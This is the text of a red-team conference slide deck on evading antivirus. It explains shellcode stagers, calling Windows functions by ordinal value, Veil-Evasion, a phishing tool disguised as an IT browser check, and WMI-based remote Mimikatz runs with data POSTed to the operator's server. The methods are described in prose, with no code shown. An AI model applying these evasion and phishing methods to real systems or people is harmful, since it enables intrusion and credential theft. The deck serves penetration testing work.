A Battle Against the Industry - Beating

Antivirus for Meterpreter and More

@ChrisTruncer

Whoami■ A systems administrator turned red teamer■ Florida State Seminole■ Open Source Software Developer

■ Veil-Framework■ EyeWitness

Thanks Robin :)■ Egress-Assess■ Just-Metadata

Why am I here today?

■Share some laughs at Antivirus :)■Give a background on stagers■Showcase a Veil-Evasion signature bypass■Anyone can do this..

■Talk about developing your own code■Case studies on previously developed code

Stagers

What are stagers?

■Can be referred to as “stage 1”■Might be msfvenom, Veil-Evasion, etc. output

■Goal is typically to inject shellcode into memory■Shellcode usually downloads and executes a

reflectively injectable dll■…but it can also do anything you want if you

write it :)

What are stagers?

■Stagers are really used as loaders for your real malware■They’re designed to be expendable and tiny■Don’t give away your engineered malware by

dropping it to disk■Load everything in memory

What are stagers?

■Any language that has the ability to access windows functions can be used to write a stager!■Pretty cool, and allows us to expand out from

traditional “Windows Langauges”■Interacting with Windows functions can seem

daunting, but isn’t all that bad■4 or 5 function calls

Function Calls

Stagers in a Nutshell

■ Allocate memory to store the shellcode being injected, and apply proper memory permissions

■ Copy the shellcode into the allocated memory■ Create a thread to run the shellcode copied into

the process’s memory■ Wait for the thread to complete running before

exiting the program

Windows API Calls

■Most stagers utilize VirtualAlloc to allocate memory

■This talk shows an alternate way to allocate memory that isn’t heavily utilized

■It might be a better way to fly under the radar

HeapCreate

■Creates a private heap object that can be used by the process creating the heap■Specify the memory protections■Requires the size of the heap that will need to be

allocated■Shellcode length

■Max size of allocated memory■I do twice the shellcode length

HeapAlloc

■ Allocates memory from the previously created heap object

■ Receives a handle to the previously allocated heap object

■ Specify the total amount of space that you are allocating for shellcode

RtlMoveMemory

■Places the shellcode you are injecting into the allocated heap space

■Needs a pointer to where data (shellcode) will be copied to (heapalloc output)

■Needs a pointer to the data (shellcode)■Needs the length of the shellcode being injected

CreateThread

■This function creates a new thread within the current process to execute the data (shellcode) that was injected

■Requires a pointer to the data (shellcode) that will run in the new thread

■Schedule the thread to execute immediately

WaitForSingleObject

■This function is like a blocking call to prevent the program from exiting immediately

■Requires a handle to the thread that was created by the CreateThread function

■Requires a value (-1) to specify that the program should wait to exit until the thread exists

Stagers in a Nutshell (Repeated)

■ Allocate memory to store the shellcode being injected, and apply proper memory permissions

■ Copy the shellcode into the allocated memory■ Create a thread to run the shellcode copied into

the process’s memory■ Wait for the thread to complete running before

exiting the program

Ordinal Values

Ordinal Values

■ Using ordinal values to reference functions is an old-school but effective way to bypass antivirus detection

■Picture an array or Python list containing functions. To reference a specific function, you reference it by its location within the array/list

■Same concept for bypassing AV via ordinal values

Ordinal Values

■ Rather than calling HeapAlloc or RtlMoveMemory by name, why not reference it by its ordinal value?

■ This is still a call to the same function, but just via a different method

■Check out this code

Ordinal Values

■Simply referencing function calls by their ordinal value vs. name can bypass anti-virus

■NOTE: Ordinal values can change between both OSs and Service Packs. You will need to target your payload to the OS and Service Pack when referencing via ordinal value.■So…. how do we find these ordinal values?

Ordinal Values

■PEView is a free program which lets you inspect PE files, dlls, etc.

■You can use this to load kernel32.dll, search for the functions that you are calling, and obtain their ordinal value

■PEView provides the base 16 value, so be sure to convert it to its base 10 value.

Veil’s Approach

How Veil-Evasion Bypasses AV

■ Completely open sourced■ Can query VT’s API

■ Veil-Evasion attempts to bypass AV through a few different techniques

■Obfuscated Code

■Encrypted Code■Non-standard languages for binaries

Flat vs. encrypted code

How Veil-Evasion Bypasses AV

■ Languages that Veil-Evasion supports■Python

■Perl

■PowerShell■C#

■C

■Go■Ruby

How Veil-Evasion Bypasses AV

■Using a non-standard language (read not C, C++, or C#) resulted in payloads that immediately bypassed antivirus

■AV just didn’t understand how to properly inspect these executables

■Example:

■C Flat vs. Python Flat

Ordinal Values

■ Simply changing the language the payload was written in completely bypassed all AV signatures.

Antivirus Signature

Veil-Evasion

■After about 1 year, Veil-Evasion finally had its first signature!

■I was informed about this on IRC and wanted to check it out.

Custom Code

Browser Check Scenario

■Instead of sending just some random executable when phishing, what if you promise to secure their system?

■Developed by Hunter Hardman (@t3ntman)

■Written in C#■Custom code, so it bypasses every single AV out

there (at least before Hunter made it public :))

Browser Check Scenario

■This works great for phishing scenarios■We target individuals impersonating their IT

Security, or just IT staff■Warn them about the dangers of

misconfigured/old browsers■Give them a solution!

Browser Check Scenario

■Once the program starts, it spawns PowerShell and executes any code you give it

■Meterpreter or Beacon!■It’s fully functional, once user tells it to start,

they see a progress bar go to completion.■Once complete, it lets them know their system is

secure!

Browser Check Scenario

■Delivery is dependent upon the situation■We’ve created websites hosting it over HTTPS

to make users think it is secure■Created fake “secure file transfer” websites

■Rarely, we’ve sent just the executable

■For our initial access, this has been pretty successful, and the lack of AV detection helps the user trust the program

Browser Check Scenario

■Currently available for review at -https://github.com/t3ntman/BrowserCheck

Enumerator

Enumerator

■Customer didn’t want actual shellcode injection of infection of their endpoints

■Wanted intel collection to act as proof of “compromise”

■I developed a script that would gather host information and would POST the data out over HTTPS to our server.

Enumerator

■Information gathered■System hostname

■IP address(es)

■System drives and drive space■Current user

■Tasklist

Github

■https://github.com/ChrisTruncer/PenTestScripts/blob/master/enumeration.py

■https://github.com/ChrisTruncer/PenTestScripts/blob/master/enum_server.py

WMIOps

WMIOps

■Why waste engineering time, developing a RAT, hoping it never gets burnt. Just leverage built in functionality!

■Anything useful for system administration is just as easily repurposed for illegitimate use :)

■Just live off the land!

WMIOps

■Used WMI much?■WMI is installed and running by default on

Windows systems since Windows 2000■It does require local admin privileges on the

targeted systemBut this can make it great for post-

exploitation

WMIOps

■ WMIOps - A PowerShell based tool which uses WMI to carry out various actions on targeted systems.

■ Developed in PowerShell - we can load it in memory and execute a variety of different tasks

WMIOps

■ Want to see which users have active processes on a system?

■Might be good to know where you can snag creds!

■Rather than needing to compromise the machine, just run a simple WMI query with WMIOps!

WMIOps

■Now that we know who is on the system, want to run Mimikatz to capture user credentials?

■Traditionally we’d have to compromise it, and load up Mimikatz.

■Why not leverage WMI to do everything in memory without needing the use of a RAT?

WMIOps

■ Invoke-RemoteScriptWithOutput■Spawn PowerShell on the remote system

■Download the PowerShell script in memory

■Runs the user specified function■Saves output

■Performs a POST over HTTPS to a user specified IP address

WMIOps

■ WMIOps can do other tasks as well■Run commands

■Kill processes

■Search for files■Transfer files

■Etc.

Available here -https://github.com/ChrisTruncer/WMIOps

Thanks!Any questions?

Reach out to me!■ @ChrisTruncer■ Chris@Christophertruncer.com■ https://www.christophertruncer.com■ https://www.github.com/ChrisTruncer